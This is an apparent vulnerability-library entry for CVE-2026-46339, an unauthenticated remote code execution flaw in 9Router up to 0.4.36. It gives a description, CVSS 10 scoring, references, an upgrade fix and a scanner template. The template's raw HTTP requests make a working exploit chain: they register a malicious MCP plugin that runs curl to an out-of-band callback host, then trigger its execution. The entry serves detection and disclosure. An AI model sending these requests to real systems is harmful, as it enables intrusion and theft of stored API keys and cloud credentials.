/Vulnerability Library

9Router <= 0.4.36 - Unauthenticated RCE

CVE-2026-46339
Early Release

Description

9Router <= 0.4.36 middleware only guards 8 explicitly listed routes, leaving /api/cli-tools/* and /api/mcp/* entirely unauthenticated. An attacker can POST to /api/cli-tools/cowork-settings to register a custom MCP plugin with attacker-controlled command and args stored verbatim into globalThis, then GET /api/mcp/{name}/sse to trigger spawn() with the stored command resulting in unauthenticated remote code execution.

Severity

Critical

CVSS Score

10

Affected Product

9router

Published Date

July 14, 2026

Template Author

0x_akoko

CVE-2026-46339.yaml
id: CVE-2026-46339

info:
  name: 9Router <= 0.4.36 - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
   9Router <= 0.4.36 middleware only guards 8 explicitly listed routes, leaving /api/cli-tools/* and /api/mcp/* entirely unauthenticated. An attacker can POST to /api/cli-tools/cowork-settings to register a custom MCP plugin with attacker-controlled command and args stored verbatim into globalThis, then GET /api/mcp/{name}/sse to trigger spawn() with the stored command resulting in unauthenticated remote code execution.
  impact: |
   Full unauthenticated RCE as the 9Router process user, exposing API keys, Claude tokens, AWS credentials, and all stored MCP plugin configuration.
  remediation: |
   Upgrade to 9Router 0.4.37 or later.
  reference:
    - https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqj
    - https://nvd.nist.gov/vuln/detail/CVE-2026-46339
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-46339
    cwe-id: CWE-78
  metadata:
    verified: true
    max-request: 3
    product: 9router
    vendor: decolua
  tags: cve,cve2026,9router,rce,mcp,unauth,critical

variables:
  plugin_name: "{{randstr}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /api/version HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "currentVersion")'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/cli-tools/cowork-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"baseUrl":"x","apiKey":"x","models":["x"],"plugins":[],"localPlugins":[],"customPlugins":[{"name":"{{plugin_name}}","command":"curl","args":["-s","{{interactsh-url}}"]}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/mcp/{{plugin_name}}/sse HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
        condition: and
# digest: 490a0046304402204a442cae7e67809cdb01f3c277a1889e4a37e774ada90ccc27d3d2031bf18b450220488071e0b8d6511ea25d33a953403d5751a70a27931e4cff0d98287d3925eb1a:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2026-46339
CWE ID:
cwe-78

References

https://github.com/decolua/9router/security/advisories/GHSA-fhh6-4qxv-rpqjhttps://nvd.nist.gov/vuln/detail/CVE-2026-46339

Remediation Steps

Upgrade to 9Router 0.4.37 or later.